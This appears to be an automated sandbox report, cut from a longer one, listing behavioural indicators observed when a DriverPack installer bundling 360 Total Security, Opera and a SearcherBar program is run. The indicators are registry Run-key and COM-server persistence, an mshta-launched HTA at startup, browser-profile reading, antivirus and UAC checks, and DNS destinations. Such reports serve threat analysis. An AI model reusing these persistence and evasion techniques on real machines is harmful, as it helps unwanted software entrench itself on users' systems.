N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e48c5a3f-93ef-43bb-a092-2c7ceb946f27}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_6.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{343e68e6-8f82-4a8d-a2da-6e9a944b378c}\InProcServer32\ = "C:\\Windows\\system32\\xactengine2_9.dll" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cecec95a-d894-491a-bee3-5e106fb59f2d}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e48c5a3f-93ef-43bb-a092-2c7ceb946f27}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{94c1affa-66e7-4961-9521-cfdef3128d4f}\InProcServer32\ = "C:\\Windows\\system32\\xactengine3_3.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e21a7345-eb21-468e-be50-804db97cf708}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_1.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{074b110f-7f58-4743-aea5-12f15b5074ed}\InProcServer32\ = "C:\\Windows\\system32\\xactengine3_5.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3a2495ce-31d0-435b-8ccf-e9f0843fd960}\InProcServer32\ = "C:\\Windows\\system32\\xactengine2_6.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5a508685-a254-4fba-9b82-9a24b00306af}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_7.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c60fae90-4183-4a3f-b2f7-ac1dc49b0e5c}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{074b110f-7f58-4743-aea5-12f15b5074ed}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{343e68e6-8f82-4a8d-a2da-6e9a944b378c}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c1e3f122-a2ea-442c-854f-20d98f8357a1}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_1.dll" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4c5e637a-16c7-4de3-9c46-5ed22181962d}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{54b68bc7-3a45-416b-a8c9-19bf19ec1df5}\InProcServer32\ = "C:\\Windows\\system32\\xactengine2_5.dll" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{bc3e0fc6-2e0d-4c45-bc61-d9c328319bd8}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cac1105f-619b-4d04-831a-44e1cbf12d57}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_7.dll" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{d3332f02-3dd0-4de9-9aec-20d85c4111b6}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3eda9b49-2085-498b-9bb2-39a6778493de}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{65d822a4-4799-42c6-9b18-d26cf66dd320}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{77c56bf4-18a1-42b0-88af-5072ce814949}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03219e78-5bc3-44d1-b92e-f63d89cc6526}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_4.dll" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0aa000aa-f404-11d9-bd7a-0010dc4f8f81}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5a508685-a254-4fba-9b82-9a24b00306af}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4c9b6dde-6809-46e6-a278-9b6a97588670}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_5.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6a93130e-1d53-41d1-a9cf-e758800bb179}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c60fae90-4183-4a3f-b2f7-ac1dc49b0e5c}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cd0d66ec-8057-43f5-acbd-66dfb36fd78c}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f4769300-b949-4df9-b333-00d33932e9a6}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f1b577e-5e5a-4e8a-ba73-c657ea8e8598}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248d8a3b-6256-44d3-a018-2ac96c459f47}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4c5e637a-16c7-4de3-9c46-5ed22181962d}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cd0d66ec-8057-43f5-acbd-66dfb36fd78c}\InProcServer32\ = "C:\\Windows\\system32\\xactengine2_7.dll" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e21a7345-eb21-468e-be50-804db97cf708}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{fac23f48-31f5-45a8-b49b-5225d61401aa}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{65d822a4-4799-42c6-9b18-d26cf66dd320}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{77c56bf4-18a1-42b0-88af-5072ce814949}\InProcServer32\ = "C:\\Windows\\system32\\xactengine2_8.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{962f5027-99be-4692-a468-85802cf8de61}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6f6ea3a9-2cf5-41cf-91c1-2170b1540063}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{b802058a-464a-42db-bc10-b650d6f2586a}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_2.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e21a7345-eb21-468e-be50-804db97cf708}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f4769300-b949-4df9-b333-00d33932e9a6}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_1.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{fac23f48-31f5-45a8-b49b-5225d61401aa}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248d8a3b-6256-44d3-a018-2ac96c459f47}\InProcServer32\ = "C:\\Windows\\system32\\xactengine3_6.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c0c56f46-29b1-44e9-9939-a32ce86867e2}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cd0d66ec-8057-43f5-acbd-66dfb36fd78c}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3b80ee2a-b0f5-4780-9e30-90cb39685b03}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6f6ea3a9-2cf5-41cf-91c1-2170b1540063}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{d06df0d0-8518-441e-822f-5451d5c595b8}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c0c56f46-29b1-44e9-9939-a32ce86867e2}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cecec95a-d894-491a-bee3-5e106fb59f2d}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_6.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{074b110f-7f58-4743-aea5-12f15b5074ed}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f1b577e-5e5a-4e8a-ba73-c657ea8e8598}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{bcc782bc-6492-4c22-8c35-f5d72fe73c6e}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f5ca7b34-8055-42c0-b836-216129eb7e30}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{bc3e0fc6-2e0d-4c45-bc61-d9c328319bd8}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f5ca7b34-8055-42c0-b836-216129eb7e30}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f5ca7b34-8055-42c0-b836-216129eb7e30}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_2.dll" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{343e68e6-8f82-4a8d-a2da-6e9a944b378c}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cac1105f-619b-4d04-831a-44e1cbf12d57}\InProcServer32\ThreadingModel = "Both" C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6a93130e-1d53-41d1-a9cf-e758800bb179}\InProcServer32 C:\Windows\regedit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{bcc782bc-6492-4c22-8c35-f5d72fe73c6e}\InProcServer32 C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{d06df0d0-8518-441e-822f-5451d5c595b8}\InProcServer32\ = "C:\\Windows\\system32\\XAudio2_5.dll" C:\Windows\regedit.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.208.34.209 N/A N/A
Destination IP 52.209.27.170 N/A N/A
Destination IP 52.209.27.170 N/A N/A
Destination IP 54.194.209.120 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NetFxUpdate_v1.1.4322 = "\"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\netfxupdate.exe\" 0 v1.1.4322 GAC + NI NID" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SearcherBar = "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\SearcherBar\\run.hta\"" C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\SearcherBar.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\DriverPack-Alice = "C:\\Users\\Admin\\AppData\\Roaming\\DRPSu\\Alice\\DriverPackAssistant.exe" C:\Windows\SysWOW64\mshta.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" /start" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" /start" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ErrorControl C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Group = "TDI" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Avira C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Performance C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Start C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Start = "2" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Type C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Type = "16" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\DisplayName = "360 Total Security" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ErrorControl = "1" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Group C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ObjectName C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\DisplayName C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ObjectName = "LocalSystem" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\f: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\p: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe N/A
File opened (read-only) \??\e: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\g: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\o: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\s: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\D: C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe N/A
File opened (read-only) \??\i: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\v: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\z: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\w: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
